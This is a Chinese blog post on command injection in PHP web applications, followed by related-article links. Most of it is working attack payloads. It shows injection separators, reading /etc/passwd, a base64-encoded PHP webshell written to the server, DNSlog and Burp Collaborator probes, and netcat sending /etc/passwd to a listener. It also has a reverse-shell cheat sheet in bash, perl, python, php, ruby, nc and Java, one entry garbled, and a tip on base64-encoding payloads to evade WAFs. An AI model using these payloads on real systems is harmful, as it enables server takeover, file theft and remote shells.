【网络安全】命令执行漏洞

已于 2023-04-19 20:35:35 修改
阅读量1.3k 收藏 1
点赞数 1
分类专栏: 网络安全 文章标签: web安全 安全 服务器
于 2023-04-19 19:49:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41158271/article/details/130250524
版权

命令执行漏洞

命令执行漏洞原理

应用程序中有时候需要调用一些执行系统命令的函数,在php中常见的为systemexecshell_execpassthruproc_poenpopen等函数用来执行系统命令。当黑客能控制这些函数的参数时,就可以讲恶意的系统命令拼接到正常的命令中,就会命令执行攻击,这就是命令执行漏洞。

危害

  1. 继承web服务器的权限执行系统命令
  2. 继承web服务器程序权限,读写文件
  3. 反弹shell
  4. 控制整个网站
  5. 控制整个服务器

检测方法

有回显检测方法

常用方法:

; (分号) 从左到右执行

在这里插入图片描述

| (管道符) 将见面命令的输入为后面命令的标准输入

在这里插入图片描述

&(后台任务符号) 命令从左到右执行

在这里插入图片描述

&&(与) 逻辑与,前面命令执行成功后才会执行

在这里插入图片描述

||(或) 逻辑或,前面执行失败才能执行

在这里插入图片描述

`(反引号)当命令解析时,首先执行反引号之间的操作

在这里插入图片描述

$(命令替换符)与反应号功能一样

在这里插入图片描述

有回显常用判断方式

win 操作系统
type c:\windows\win.ini
linux 操作系统
cat /etc/passwd

无回显且有写入权限
  1. 传webshell到服务器中
|echo "PD9waHAgcGhwaW5mbygpO2V2YWwoJF9QT1NUWydjbWQnXSk/Pg=="|base64 -d >shell.php  #base64解码后写入到shell.php文件中

在这里插入图片描述
在这里插入图片描述

  1. 查看是否可以访问
    在这里插入图片描述

  2. 使用webshell工具连接
    在这里插入图片描述
    在这里插入图片描述

无回显利用dnslog平台检测

借助dnslog.cn查看访问
链接: http://dnslog.cn/
在这里插入图片描述

  1. 访问dnslog平台生成的域名
`whoami`.7w1v2u.dnslog.cn
  1. 查看dnslog平台是否有访问信息
    在这里插入图片描述
无回显利用bp检测

利用原理与dnslog是一样的

  1. 找到bp相关模块

在这里插入图片描述

  1. 复制dns地址
    在这里插入图片描述

  2. 访问此地址

|ping -c 4 m1odth5coly60euvoihemfn5kwqnec.burpcollaborator.net
  1. 刷新bp查看结果
    在这里插入图片描述
无回显利用netcat命令检测
  1. 使用kali监听9999端口

在这里插入图片描述

  1. 漏洞位置输入命令
|nc 192.168.0.107 9999 </etc/passwd
  1. 查看kali生成的文件信息

在这里插入图片描述

命令执行漏洞nc反弹shell

  1. 使用kali监听
nc -vlnp 8080
  1. 漏洞位置执行命令
|/bin/bash -c 'bash -i >& /dev/tcp/192.168.0.107/8080 0>&1'

在这里插入图片描述
在这里插入图片描述

常用的shell反弹命令:

bash shell 执行
||/bin/bash -c ‘bash -i >& /dev/tcp/192.168.0.124/8080 0>&1’
perl -e ‘use
Socket; i = " 10.0.0.1 " ; i="10.0.0.1"; i="10.0.0.1";p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(
“tcp”));if(connect(S,sockaddr_in( p , i n e t a t o n ( p,inet_aton( p,inetaton(i)))){open(STDIN,“>&S”);open(STD
OUT,“>&S”);open(STDERR,“>&S”);exec(“/bin/sh -i”);};’
python -c ‘import
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.co
nnect((“10.0.0.1”,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,“-i”]);’
php -r ‘$sock=fsockopen(“10.0.0.1”,1234);exec(“/bin/sh -i <&3 >&3 2>&3”);’
ruby -rsocket -e’f=TCPSocket.open(“10.0.0.1”,1234).to_i;exec sprintf(“/bin/sh -i
<&%d >&%d 2>&%d”,f,f,f)’
nc -e /bin/sh 10.0.0.1 1234
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
r = Runtime.getRuntime()
p = r.exec([“/bin/bash”,“-c”,“exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line;
do $line 2>&5 >&5; done”] as String[])
p.waitFor()

tips: 如果遇到waf连接可以把语句进行base64加密后输入

边缘拼命划水的小陈
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网络安全原理与应用:windows命令执行漏洞演示.pptx
05-16
网络安全原理与应用:Windows命令执行漏洞演示】 在网络安全领域,Web应用安全是至关重要的一环,而Windows命令执行漏洞则是其中常见的威胁之一。本演示主要针对Windows系统中的命令执行漏洞,通过DVWA(Damn ...
远程命令执行漏洞
08-10
总之,远程命令执行漏洞网络安全领域的一个关键问题,尤其是在Web应用程序中。深入理解这类漏洞的成因、影响和防范措施,对于保护系统免受攻击具有重要意义。通过学习源码、使用检测工具,我们可以更好地理解和...
网络安全——命令执行漏洞概述
weixin_54055099的博客
09-17 2595
命令执行漏洞的概述,管道符号在LINUX和Windows的用户
命令执行漏洞
qq_48904485的博客
03-21 1961
一、命令执行介绍 1、命令执行漏洞原理 命令执行漏洞定义:Web应用程序接收用户输入,拼接到要执行的系统命令执行。 产生原因: 1、用户输入未过滤或净化; 2、拼接到系统命令执行。 2、PHP下命令执行函数 在PHP中具有执行系统命令功能的函数如下: 1、system 2、exec 3、shell_exec 4、passthru 5、popen 6、proc_popen 7、`反引号 8、ob_start 9、mail函数+LD_PRELOAD执行系统命令 使用示例: L
命令执行漏洞概述
最新发布
qq_52712762的博客
05-26 1165
命令执行漏洞是指攻击者可以随意执行系统命令,分为远程命令执行(远程代码执行)和系统命令执行两类。
命令执行漏洞详解
热门推荐
weixin_42566218的博客
03-08 1万+
一、命令执行漏洞原理 在编写程序的时候,当碰到要执行系统命令来获取一些信息时,就要调用外部命令的函数,比如php中的exec()、system()等,如果这些函数的参数是由用户所提供的,那么恶意用户就可能通过构造命令拼接来执行额外系统命令,比如这样的代码 <?php system("ping -c 1 ".$_GET['ip']); ?> 程序的本意是让用户传入一个ip地址去测试网络连通性,但是由于参数不可控,当我们传入的ip参数为"127.0.0.1;id“时,执行命令就便成了
Web的基本漏洞--命令执行漏洞RCE
尽欢的博客
05-31 1579
命令执行漏洞介绍
网络安全原理与应用:命令执行漏洞简介.pptx
05-16
**网络安全原理与应用:命令执行漏洞详解** 命令执行漏洞是Web应用安全领域中一个至关重要的问题,它涉及到服务器上的程序如何处理用户输入并执行系统命令。这种漏洞的存在使得攻击者有机会利用不恰当的数据过滤,...
网络安全初探SQL注入漏洞
07-02
网络安全领域,SQL注入漏洞是一种常见的安全威胁,尤其在基于Web的应用程序中。本文将深入探讨SQL注入漏洞的原理、危害、以及如何防范这一问题。 SQL(Structured Query Language)是用于管理和处理关系数据库的...
文件包含、命令执行漏洞、代码执行漏洞、基础代码审计
09-26
文件包含、命令执行漏洞、代码执行漏洞、基础代码审计 文件包含漏洞是指在开发过程中,开发人员将可重复使用的函数写入单个文件中,并在需要时调用该文件,而不是重新编写代码。这种调用文件的过程称为包含。文件...
Web安全之命令执行漏洞
qq_42751192的博客
08-12 1285
当 Web 应用需要调用一些执行系统命令的函数时,并且用户能控制这些函数中的参数时,就可以将恶意系统命令拼接到正常命令中,从而造成命令执行攻击,这就是命令执行漏洞
漏洞挖掘之命令注入漏洞
kali_Ma的博客
12-15 951
受影响的Bitbucket Server 和 Data Center版本存在使用环境变量的命令注入漏洞,具有控制其用户名权限的攻击者可以在系统上执行任意命令
渗透测试 [命令执行漏洞]
npc88888的博客
03-12 990
system(args) 有回显passthru(args)(有回显)exec(args) (回显最后一行-必须 echo 输出)shell_exec(args) (无回显-必须输出)反引号:`` popen(handle,mode)(无回显)proc_open('cmd','flag','flag')(无回显)
Kali Linux渗透测试 086 手动漏洞挖掘-命令执行漏洞
kevinhanser
03-21 2186
本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程 Kali Linux渗透测试(苑房弘)博客记录 1. 命令执行漏洞 采用 DVWA 系统,IP地址:10.10.10.132 Kali Linux 2018.1,IP地址:10.10.10.131 简介应用程序直接调用操作系统命令的功能 2. 测试 Low
bash破壳漏洞反弹shell
3569
07-29 4817
0x00 破壳漏洞原理在bash里边输入~ export name='() { echo "inside name";}; echo "outside name";'查看环境变量~ env|grep name ~ name=() { echo "inside name";}; echo "outside name";这时你会发现当进入子shell的时候,直接输出 outside name~ bas
"文件包含与命令执行漏洞分析及审计
综上所述,文件包含漏洞命令执行漏洞和代码执行漏洞是应用程序中常见的安全问题,对于开发人员来说,需要充分了解这些漏洞的原理和产生原因,采取有效的措施进行修复和防范。基础代码审计是发现和修复这些漏洞的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值